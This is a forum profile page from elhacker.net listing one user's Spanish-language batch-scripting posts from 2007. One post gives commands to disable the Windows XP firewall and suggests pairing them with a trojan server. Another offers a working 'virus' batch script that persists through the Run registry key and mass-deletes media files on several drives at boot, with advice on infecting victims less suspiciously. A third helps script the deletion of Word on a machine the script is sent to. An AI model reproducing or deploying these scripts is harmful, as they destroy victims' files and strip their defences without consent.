elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 ... 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28]
271  Programación / Scripting / ayuda registro xp en: 22 Octubre 2007, 16:19 pm
Hola, tengo un problema. Hice un script en BATCH que borra y crea unas entradas en el registro. Por ejemplo, tengo esto en mi PC:

HKEY_USERS\S-1-5-21-1547161642-1659004503-682003330-500\Software\Microsoft\Windows\CurrentVersion\Policies\... Esta clave tengo en mi registro. Pero he visto que no todas son iguales a esta, por ejemplo hay otra que es algo asi (y debe haber más... :-\ ):

HKEY_USERS\S-1-5-21-1961063573-973683775-492528769-500\Software\Microsoft\Windows\CurrentVersion\Policies\... Esta aparece en otra PC cualquiera. También con XP SP2.

Como ven (los numero en rojo) son diferentes en HKEY_USERS. Mi pregunta es esta, ¿ Cómo puedo hacer para borrar y crear las claves del registro en HKEY_USERS sin tener que escribir todos esos numeros para llegar a ...\Software\Microsoft\Windows\CurrentVersion\Policies ?.

Por favor diganme cómo hacerlo. GRACIAS.
272  Programación / Scripting / Re: DetenerFirewall Windows XP SP2 - BATCH en: 13 Octubre 2007, 14:58 pm
¿Como se harian esas excepcines que decis? ¿Y a que apuntan esas claves del registros?

Gracias por colaborar.
Saludos
273  Programación / Scripting / DetenerFirewall Windows XP SP2 - BATCH en: 13 Octubre 2007, 07:48 am
   ---------------   DETENER EL SERVICIO DEL FIREWALL DE WINDOWS   ---------------   
Hola espero que les sirva esto. Es para desactivar el Firewall de windows.

1º Método

Si presionamos en nuestra shell  net start, veremos los servicios activos que tenemos, entre todos encontramos el Firewall de Windows. Ahora, para desactivar el servicio tendremos que ejecutar en nuestra shell:

Código:
net stop “Firewall de Windows/Conexión compartida a Internet (ICS)”

y listo, ahora tenemos detuvimos el servicio del Firewall de Windows. Imaginense si adjuntamos este codigo a un script batch y el server de algun troyano. Lo use y funciona muy bien. El codigo es este. Por favor lean todo para que no tengan problemas.

Código:
echo off
cd \
net stop “Firewall de Windows/Conexión compartida a Internet (ICS)” 
exit

Para inicializar el servicio nuevamente es este:

Código:
@echo off
cd \
net start “Firewall de Windows/Conexión compartida a Internet (ICS)” 
exit

Aclaración:
Este script batch detiene el Firewall de Windows solamente. El problema de esto es que contiene caracteres con acento en "../Conexión .."y puede que no se ejecute el comando como debe. Prueben. Pero lo mas seguro es que le funcione con este script que es exactamente el mismo que los anteriores, solo que escribe el acento donde debe. (Crear el batch en el bloc de notas)

Para desactivarlo:

Código:
@echo off
cd \
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"
exit

Para activarlo:

Código:
@echo off
cd \
net start "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"
exit

2º Método

Puede que el mas efectivo. Pero queda en ustedes el metodo que elijan.
Seguramente no lo conocen, pero les va a gustar...
Nos dirigimos a: C:\Windows\system32
Allí se encuentra un programa con el que se puede activar/desactivar el firewall de windows.

Código:
C:\Windows\system32>

(Una vez allí hacemos lo siguiente)

Código:
C:\Windows\system32>netsh 
netsh> 
netsh>firewall 
netsh firewall> 

netsh firewall>set opmode mode = DISABLE
Aceptar

Primero se abre el prgrama netsh, que se encuentra en system32, y después se escriben unos simples comandos para desactivar el firewall.
Parecerá que no ha pasado nada pero acabamos de desactivar el firewall.

Para volverlo a activar hacemos lo siguiente:

Código:
netsh firewall>set opmode mode = ENABLE


Y se vuelve a activar.

Como pueden ver este método és rápido y fácil, y no para el servicio como en el net stop sinó que se desactiva el firewall hasta nueva orden.
274  Programación / Scripting / Re: Nuevo virus borra archivos MP3 del disco duro en: 12 Octubre 2007, 08:51 am
Yo lo haría asi de sencillo y efectivo para cualquier unidad del PC

Código:
@echo off
reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t reg_sz /d "C:\windows\system32\virus.bat" /f
if exist %Systemroot%\System32\ref.dll goto kaboom
:kaboom
cd \
if exist C:\ del /s *.mp3|del /s *.mpg|del /s *.jpg|del /s *.avi
if exist D:\ del /s *.mp3|del /s *.mpg|del /s *.jpg|del /s *.avi
if exist X:\ del /s *.mp3|del /s *.mpg|del /s *.jpg|del /s *.avi
goto FIN
echo SOLO_REFERENCIA>"%Systemroot%\System32\ref.dll"
:FIN
del %Systemroo%\System32\ref.dll
del *.bat
:EOF
exit

De esta manera se eliminan los archivos en cada carpeta de la Unidad seleccionada existente en el disco únicamente al iniciar Windows y no cuando lo ejecuten, de esta manera no será tan sospechoso cuando tengas que infectar. Fijate en donde está X le podes poner las unidades de disco que quieras y asi sucesivamente hasta llegar hasta donde quieras. (he visto computadoras que tiene hasta la unidad Z)
275  Programación / Scripting / Re: Cómo sería esta instrucción en Batch? en: 12 Octubre 2007, 07:47 am
Cita de: ramonecaxa en  3 Octubre 2007, 06:06 am
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
"1"="eLePhantClient"
quiero q no se ejecute lphant :rolleyes: :rolleyes: :rolleyes:.

Mirá, por empezar no se que es el lphant pero para que no se ejecute tal programa yo lo haría de esta forma mediante un script batch:

Código:
@echo off
echo Windows Registry Editor Version 5.00>temp.reg

echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]>>temp.reg
echo "0"="eLePhantClient">>temp.reg
regedit /s temp.reg
del temp.reg

Fijate que le cambié el 1 que tenia originalmente por un 0. Es válido también hacerlo de esta manera:

Código:
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /v eLePhantClient /t REG_DWORD /d 0
exit

Donde también le cambié por 0 al dato de dicha entrada al registro. Probá, a ver que pasa...

Saludos.
276  Programación / Scripting / Re: Terminar proceso y borrar ejecutable en BATCH en: 12 Octubre 2007, 07:33 am
Cita de: HyphenSpider en  5 Septiembre 2007, 17:16 pm
Hola!

Mirad, estoy trabajando con este código:

Código:
@echo off
AT 17:14 cmd /c taskkill /f /IM WINWORD.exe
AT 17:14 cmd /c del /q /s /f "%PROGRAMFILES%\Office\WINWORD.exe"
cls 
exit

Pero tengo un problema: (creo que) el ejecutable del Word no se cierra porque, cuando lo intenta hacer, Word todavía se está ejecutando.

Hay alguna forma de solucionar eso sin tener que esperar un minuto más para poder eliminar el ejecutable?

Gracias,


Bueno, mirá. A tu script batch lo haría de esta manera (creo que puede ser más efectivo)

Código:
@echo off
AT 17:14:00 taskkill /f /IM WINWORD.exe
AT 17:14:02 del /q /s /f "%PROGRAMFILES%\Office\WINWORD.exe"
cls 
exit

En este script lo único que le saqué fue el comando que llama al cmd.exe, es decir, le saqué 
Código:
cmd /c

Probalo y decime que sucede... O también podés probarlo sin las comillas en donde dice %PROGRAMFILES%\Office\WINWORD.exe. Sacale las comillas esas ;) quizá por ahí sea tu problema...

También te aclaro algo más, el archivo WINWORD.exe no siempre se guarda en "%PROGRAMFILES%\Office\WINWORD.exe" ya que en cada versión del Office los archivos se crean en otras carpetas diferentes al que pusiste en tu Script. Por ejemplo en mi caso que uso el Office 2003: El archivo WINWORD.exe se guarda en C:\Archivos de programa\Microsoft Office\OFFICE11\WINWORD.exe. En caso de que le vayas a enviar a alguien asegúrate de que versión del Office esta usando o en qué carpeta está alojado el WINWORD.exe y crea tu Script para que elimine dicho archivo.
Páginas: 1 ... 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines